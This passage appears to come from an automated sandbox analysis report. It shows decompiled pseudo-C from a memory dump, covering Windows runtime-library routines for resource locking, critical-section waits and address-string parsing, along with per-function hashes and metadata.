                                                                                                                                                                							_t40 = E02027707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                							_t58 = _t58 + 0x10;
                                                                                                                                                                							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                						}
                                                                                                                                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                						 *_t52 = _t53;
                                                                                                                                                                						if( *_t52 < _t53) {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						} else {
                                                                                                                                                                							E01FF2340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                							_t26 = 0;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				return E01FFE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                			}





















                                                                                                                                                                APIs
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 0205EA22
                                                                                                                                                                  • Part of subcall function 020313CB: ___swprintf_l.LIBCMT ref: 0203146B
                                                                                                                                                                  • Part of subcall function 020313CB: ___swprintf_l.LIBCMT ref: 02031490
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 0203156D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                • Opcode ID: 0bcf21b17e1d9ea9577a026ce9fced55516a63b4e7aa7f4655af7f6cd3d7a6f4
                                                                                                                                                                • Instruction ID: 441c37c4a307f4d929f168708d4e39a6cd80767cd132d6a36dfb056595d173d0
                                                                                                                                                                • Opcode Fuzzy Hash: 0bcf21b17e1d9ea9577a026ce9fced55516a63b4e7aa7f4655af7f6cd3d7a6f4
                                                                                                                                                                • Instruction Fuzzy Hash: F6218072900329DBCB62DF64CC40AEEB3ACBF58714F444556ED4AD3140DB71EA589BE1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                                			E020153A5(signed int _a4, char _a8) {
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t32;
                                                                                                                                                                				signed int _t37;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				signed int _t42;
                                                                                                                                                                				void* _t45;
                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                				void* _t48;
                                                                                                                                                                				signed int _t49;
                                                                                                                                                                				void* _t51;
                                                                                                                                                                				signed int _t57;
                                                                                                                                                                				signed int _t64;
                                                                                                                                                                				signed int _t71;
                                                                                                                                                                				void* _t74;
                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                				signed int* _t79;
                                                                                                                                                                				void* _t85;
                                                                                                                                                                				signed int _t86;
                                                                                                                                                                				signed int _t92;
                                                                                                                                                                				void* _t104;
                                                                                                                                                                				void* _t105;
                                                                                                                                                                
                                                                                                                                                                				_t64 = _a4;
                                                                                                                                                                				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                				_t71 = _t64 + 0x28;
                                                                                                                                                                				_push(_t92);
                                                                                                                                                                				if(_t32 < 0) {
                                                                                                                                                                					_t78 =  *[fs:0x18];
                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                						goto L3;
                                                                                                                                                                					} else {
                                                                                                                                                                						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L3:
                                                                                                                                                                					_push(_t86);
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L4:
                                                                                                                                                                						__eflags = _t32;
                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						__eflags = _a8;
                                                                                                                                                                						if(_a8 == 0) {
                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                							return 0;
                                                                                                                                                                						} else {
                                                                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                							_t79 = _t64 + 0x24;
                                                                                                                                                                							_t71 = 1;
                                                                                                                                                                							asm("lock xadd [eax], ecx");
                                                                                                                                                                							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                							_a4 = _t32;
                                                                                                                                                                							__eflags = _t32;
                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                								L19:
                                                                                                                                                                								_t86 = 0;
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                								while(1) {
                                                                                                                                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                									asm("sbb esi, esi");
                                                                                                                                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020d01c0;
                                                                                                                                                                									_push(_t92);
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_t37 = E01FEF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                									__eflags = _t37 - 0x102;
                                                                                                                                                                									if(_t37 != 0x102) {
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t71 =  *(_t92 + 4);
                                                                                                                                                                									_t85 =  *_t92;
                                                                                                                                                                									_t51 = E02034FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                									_push(_t85);
                                                                                                                                                                									_push(_t51);
                                                                                                                                                                									E02043F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                									E02043F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                									_t86 = _t86 + 1;
                                                                                                                                                                									_t105 = _t104 + 0x28;
                                                                                                                                                                									__eflags = _t86 - 2;
                                                                                                                                                                									if(__eflags > 0) {
                                                                                                                                                                										E0207217A(_t71, __eflags, _t64);
                                                                                                                                                                									}
                                                                                                                                                                									_push("RTL: Re-Waiting\n");
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_push(0x65);
                                                                                                                                                                									E02043F92();
                                                                                                                                                                									_t104 = _t105 + 0xc;
                                                                                                                                                                								}
                                                                                                                                                                								__eflags = _t37;
                                                                                                                                                                								if(__eflags < 0) {
                                                                                                                                                                									_push(_t37);
                                                                                                                                                                									E02033915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                									asm("int3");
                                                                                                                                                                									_t40 =  *_t71;
                                                                                                                                                                									 *_t71 = 0;
                                                                                                                                                                									__eflags = _t40;
                                                                                                                                                                									if(_t40 == 0) {
                                                                                                                                                                										L1:
                                                                                                                                                                										_t42 = E02015384(_t92 + 0x24);
                                                                                                                                                                										if(_t42 != 0) {
                                                                                                                                                                											goto L31;
                                                                                                                                                                										} else {
                                                                                                                                                                											goto L2;
                                                                                                                                                                										}
                                                                                                                                                                									} else {
                                                                                                                                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                										_push( &_a4);
                                                                                                                                                                										_push(_t40);
                                                                                                                                                                										_t49 = E01FEF970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                										__eflags = _t49;
                                                                                                                                                                										if(__eflags >= 0) {
                                                                                                                                                                											goto L1;
                                                                                                                                                                										} else {
                                                                                                                                                                											_push(_t49);
                                                                                                                                                                											E02033915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                											L31:
                                                                                                                                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                											_push( &_a4);
                                                                                                                                                                											_push(1);
                                                                                                                                                                											_t42 = E01FEF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                											__eflags = _t42;
                                                                                                                                                                											if(__eflags >= 0) {
                                                                                                                                                                												L2:
                                                                                                                                                                												return _t42;
                                                                                                                                                                											} else {
                                                                                                                                                                												_push(_t42);
                                                                                                                                                                												E02033915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                												_push( &_a4);
                                                                                                                                                                												_push(1);
                                                                                                                                                                												_t42 = E01FEF970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                												__eflags = _t42;
                                                                                                                                                                												if(__eflags >= 0) {
                                                                                                                                                                													goto L2;
                                                                                                                                                                												} else {
                                                                                                                                                                													_push(_t42);
                                                                                                                                                                													_t45 = E02033915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                													asm("int3");
                                                                                                                                                                													while(1) {
                                                                                                                                                                														_t74 = _t45;
                                                                                                                                                                														__eflags = _t45 - 1;
                                                                                                                                                                														if(_t45 != 1) {
                                                                                                                                                                															break;
                                                                                                                                                                														}
                                                                                                                                                                														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                														_t45 = _t74;
                                                                                                                                                                														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                														__eflags = _t45 - _t74;
                                                                                                                                                                														if(_t45 != _t74) {
                                                                                                                                                                															continue;
                                                                                                                                                                														} else {
                                                                                                                                                                															_t46 =  *[fs:0x18];
                                                                                                                                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                															return _t46;
                                                                                                                                                                														}
                                                                                                                                                                														goto L38;
                                                                                                                                                                													}
                                                                                                                                                                													E02015329(_t74, _t92);
                                                                                                                                                                													_push(1);
                                                                                                                                                                													_t48 = E020153A5(_t92);
                                                                                                                                                                													return _t48;
                                                                                                                                                                												}
                                                                                                                                                                											}
                                                                                                                                                                										}
                                                                                                                                                                									}
                                                                                                                                                                								} else {
                                                                                                                                                                									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                							} else {
                                                                                                                                                                								_t71 =  *_t79;
                                                                                                                                                                								__eflags = _t71;
                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                									while(1) {
                                                                                                                                                                										_t57 = _t71;
                                                                                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                										__eflags = _t57 - _t71;
                                                                                                                                                                										if(_t57 == _t71) {
                                                                                                                                                                											break;
                                                                                                                                                                										}
                                                                                                                                                                										_t71 = _t57;
                                                                                                                                                                										__eflags = _t57;
                                                                                                                                                                										if(_t57 > 0) {
                                                                                                                                                                											continue;
                                                                                                                                                                										}
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t32 = _a4;
                                                                                                                                                                									__eflags = _t71;
                                                                                                                                                                								}
                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                									continue;
                                                                                                                                                                								} else {
                                                                                                                                                                									goto L19;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L38;
                                                                                                                                                                					}
                                                                                                                                                                					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                					_t32 = 0;
                                                                                                                                                                					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                					if(0 != 0) {
                                                                                                                                                                						goto L4;
                                                                                                                                                                					} else {
                                                                                                                                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				L38:
                                                                                                                                                                			}



























                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020522F4
                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020522FC
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 02052328
                                                                                                                                                                • RTL: Resource at %p, xrefs: 0205230B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-871070163
                                                                                                                                                                • Opcode ID: 5553d0cae0cb9579649d3d345a9bc9cbdc89e289c0c4b3ab3d95231cf86056ca
                                                                                                                                                                • Instruction ID: c8c4935f417a63b26bab49d2da89a05dc3f9c91e3a3761bc7bb1384d7380e823
                                                                                                                                                                • Opcode Fuzzy Hash: 5553d0cae0cb9579649d3d345a9bc9cbdc89e289c0c4b3ab3d95231cf86056ca
                                                                                                                                                                • Instruction Fuzzy Hash: 8751E5B16017166FDB12DB29CCC0FE777E9AF94324F104269ED49DF280EB61E8419BA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                			E0201EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                				signed int _v36;
                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                				short _v66;
                                                                                                                                                                				char _v72;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                				signed int _t44;
                                                                                                                                                                				void* _t46;
                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                				signed int _t49;
                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                				signed char _t67;
                                                                                                                                                                				void* _t72;
                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                				intOrPtr* _t80;
                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                				intOrPtr* _t85;
                                                                                                                                                                				void* _t91;
                                                                                                                                                                				void* _t92;
                                                                                                                                                                				void* _t93;
                                                                                                                                                                
                                                                                                                                                                				_t80 = __edi;
                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                				_t70 = __ecx;
                                                                                                                                                                				_t84 = _a4;
                                                                                                                                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                					E0200DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                				}
                                                                                                                                                                				_push(0);
                                                                                                                                                                				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                				if(_t38 == 0xffffffff) {
                                                                                                                                                                					_t39 =  *0x20d793c; // 0x0
                                                                                                                                                                					_push(0);
                                                                                                                                                                					_push(_t84);
                                                                                                                                                                					_t40 = E01FF16C0(_t39);
                                                                                                                                                                				} else {
                                                                                                                                                                					_t40 = E01FEF9D4(_t38);
                                                                                                                                                                				}
                                                                                                                                                                				_pop(_t85);
                                                                                                                                                                				__eflags = _t40;
                                                                                                                                                                				if(__eflags < 0) {
                                                                                                                                                                					_push(_t40);
                                                                                                                                                                					E02033915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                					asm("int3");
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L21:
                                                                                                                                                                						_t76 =  *[fs:0x18];
                                                                                                                                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                							_v66 = 0x1722;
                                                                                                                                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_t76 =  &_v72;
                                                                                                                                                                							_push( &_v72);
                                                                                                                                                                							_v28 = _t85;
                                                                                                                                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_push(0x10);
                                                                                                                                                                							_push(0x20402);
                                                                                                                                                                							E01FF01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                						}
                                                                                                                                                                						while(1) {
                                                                                                                                                                							_t43 = _v8;
                                                                                                                                                                							_push(_t80);
                                                                                                                                                                							_push(0);
                                                                                                                                                                							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                							if(_t43 == 0xffffffff) {
                                                                                                                                                                								_t71 =  *0x20d793c; // 0x0
                                                                                                                                                                								_push(_t85);
                                                                                                                                                                								_t44 = E01FF1F28(_t71);
                                                                                                                                                                							} else {
                                                                                                                                                                								_t44 = E01FEF8CC(_t43);
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _t44 - 0x102;
                                                                                                                                                                							if(_t44 != 0x102) {
                                                                                                                                                                								__eflags = _t44;
                                                                                                                                                                								if(__eflags < 0) {
                                                                                                                                                                									_push(_t44);
                                                                                                                                                                									E02033915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                									asm("int3");
                                                                                                                                                                									E02072306(_t85);
                                                                                                                                                                									__eflags = _t67 & 0x00000002;
                                                                                                                                                                									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                										_t72 = _t7;
                                                                                                                                                                										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                										__eflags = _t67 - _t67;
                                                                                                                                                                										if(_t67 == _t67) {
                                                                                                                                                                											E0201EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                										}
                                                                                                                                                                									}
                                                                                                                                                                									return 0;
                                                                                                                                                                								} else {
                                                                                                                                                                									__eflags = _v24;
                                                                                                                                                                									if(_v24 != 0) {
                                                                                                                                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                									}
                                                                                                                                                                									return 2;
                                                                                                                                                                								}
                                                                                                                                                                								goto L36;
                                                                                                                                                                							}
                                                                                                                                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                							_push(_t67);
                                                                                                                                                                							_t46 = E02034FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                							_push(_t77);
                                                                                                                                                                							E02043F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                							_t48 =  *_t85;
                                                                                                                                                                							_t92 = _t91 + 0x18;
                                                                                                                                                                							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                							if(_t48 == 0xffffffff) {
                                                                                                                                                                								_t49 = 0;
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                							}
                                                                                                                                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_push(_t49);
                                                                                                                                                                							_t50 = _v12;
                                                                                                                                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                							_push(_t85);
                                                                                                                                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                							E02043F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                							_t53 =  *_t85;
                                                                                                                                                                							_t93 = _t92 + 0x20;
                                                                                                                                                                							_t67 = _t67 + 1;
                                                                                                                                                                							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                							if(_t53 != 0xffffffff) {
                                                                                                                                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _t67 - 2;
                                                                                                                                                                							if(_t67 > 2) {
                                                                                                                                                                								__eflags = _t85 - 0x20d20c0;
                                                                                                                                                                								if(_t85 != 0x20d20c0) {
                                                                                                                                                                									_t76 = _a4;
                                                                                                                                                                									__eflags = _a4 - _a8;
                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                										E0207217A(_t71, __eflags, _t85);
                                                                                                                                                                									}
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							_push("RTL: Re-Waiting\n");
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_push(0x65);
                                                                                                                                                                							_a8 = _a4;
                                                                                                                                                                							E02043F92();
                                                                                                                                                                							_t91 = _t93 + 0xc;
                                                                                                                                                                							__eflags =  *0x7ffe0382;
                                                                                                                                                                							if( *0x7ffe0382 != 0) {
                                                                                                                                                                								goto L21;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L36;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					return _t40;
                                                                                                                                                                				}
                                                                                                                                                                				L36:
                                                                                                                                                                			}


                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020524BD
                                                                                                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0205248D
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 020524FA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                • API String ID: 0-3177188983
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E0202FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				signed int _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				signed int _t105;
                                                                                                                                                                				void* _t110;
                                                                                                                                                                				char _t114;
                                                                                                                                                                				short _t115;
                                                                                                                                                                				void* _t118;
                                                                                                                                                                				signed short* _t119;
                                                                                                                                                                				short _t120;
                                                                                                                                                                				char _t122;
                                                                                                                                                                				void* _t127;
                                                                                                                                                                				void* _t130;
                                                                                                                                                                				signed int _t136;
                                                                                                                                                                				intOrPtr _t143;
                                                                                                                                                                				signed int _t158;
                                                                                                                                                                				signed short* _t164;
                                                                                                                                                                				signed int _t167;
                                                                                                                                                                				void* _t170;
                                                                                                                                                                
                                                                                                                                                                				_t158 = 0;
                                                                                                                                                                				_t164 = _a4;
                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                				_t136 = 0;
                                                                                                                                                                				while(1) {
                                                                                                                                                                					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                					if(_t167 == _t158) {
                                                                                                                                                                						break;
                                                                                                                                                                					}
                                                                                                                                                                					_t118 = _v20 - _t158;
                                                                                                                                                                					if(_t118 == 0) {
                                                                                                                                                                						if(_t167 == 0x3a) {
                                                                                                                                                                							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                								break;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t119 =  &(_t164[1]);
                                                                                                                                                                								if( *_t119 != _t167) {
                                                                                                                                                                									break;
                                                                                                                                                                								}
                                                                                                                                                                								_t143 = 2;
                                                                                                                                                                								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                								_v28 = 1;
                                                                                                                                                                								_v8 = _t143;
                                                                                                                                                                								_t136 = _t136 + 1;
                                                                                                                                                                								L47:
                                                                                                                                                                								_t164 = _t119;
                                                                                                                                                                								_v20 = _t143;
                                                                                                                                                                								L14:
                                                                                                                                                                								if(_v24 == _t158) {
                                                                                                                                                                									L19:
                                                                                                                                                                									_t164 =  &(_t164[1]);
                                                                                                                                                                									_t158 = 0;
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v12 == _t158) {
                                                                                                                                                                									if(_v16 > 4) {
                                                                                                                                                                										L29:
                                                                                                                                                                										return 0xc000000d;
                                                                                                                                                                									}
                                                                                                                                                                									_t120 = E0202EE02(_v24, _t158, 0x10);
                                                                                                                                                                									_t170 = _t170 + 0xc;
                                                                                                                                                                									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                									_t136 = _t136 + 1;
                                                                                                                                                                									goto L19;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v16 > 3) {
                                                                                                                                                                									goto L29;
                                                                                                                                                                								}
                                                                                                                                                                								_t122 = E0202EE02(_v24, _t158, 0xa);
                                                                                                                                                                								_t170 = _t170 + 0xc;
                                                                                                                                                                								if(_t122 > 0xff) {
                                                                                                                                                                									goto L29;
                                                                                                                                                                								}
                                                                                                                                                                								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                								goto L19;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						L21:
                                                                                                                                                                						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                							break;
                                                                                                                                                                						} else {
                                                                                                                                                                							if(E0202685D(_t167, 4) == 0) {
                                                                                                                                                                								if(E0202685D(_t167, 0x80) != 0) {
                                                                                                                                                                									if(_v12 > 0) {
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t127 = 1;
                                                                                                                                                                									_a7 = 1;
                                                                                                                                                                									_v24 = _t164;
                                                                                                                                                                									_v20 = 1;
                                                                                                                                                                									_v16 = 1;
                                                                                                                                                                									L36:
                                                                                                                                                                									if(_v20 == _t127) {
                                                                                                                                                                										goto L19;
                                                                                                                                                                									}
                                                                                                                                                                									_t158 = 0;
                                                                                                                                                                									goto L14;
                                                                                                                                                                								}
                                                                                                                                                                								break;
                                                                                                                                                                							}
                                                                                                                                                                							_a7 = 0;
                                                                                                                                                                							_v24 = _t164;
                                                                                                                                                                							_v20 = 1;
                                                                                                                                                                							_v16 = 1;
                                                                                                                                                                							goto L19;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_t130 = _t118 - 1;
                                                                                                                                                                					if(_t130 != 0) {
                                                                                                                                                                						if(_t130 == 1) {
                                                                                                                                                                							goto L21;
                                                                                                                                                                						}
